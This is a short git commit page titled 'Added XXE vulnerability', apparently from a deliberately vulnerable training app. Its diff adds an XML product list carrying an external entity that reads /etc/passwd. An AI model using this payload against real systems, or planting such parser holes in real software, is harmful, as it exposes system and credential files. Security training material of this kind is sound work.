1
0

Added XXE vulnerability

This commit is contained in:
2021-03-02 20:57:11 +02:00
parent fee6e985c3
commit 1283970bea
6 changed files with 66 additions and 18 deletions

View File

@ -0,0 +1,10 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<products>
<product>Coffee</product>
<product>Tea</product>
<product>Chocholate</product>
<product>&xxe;</product>
</products>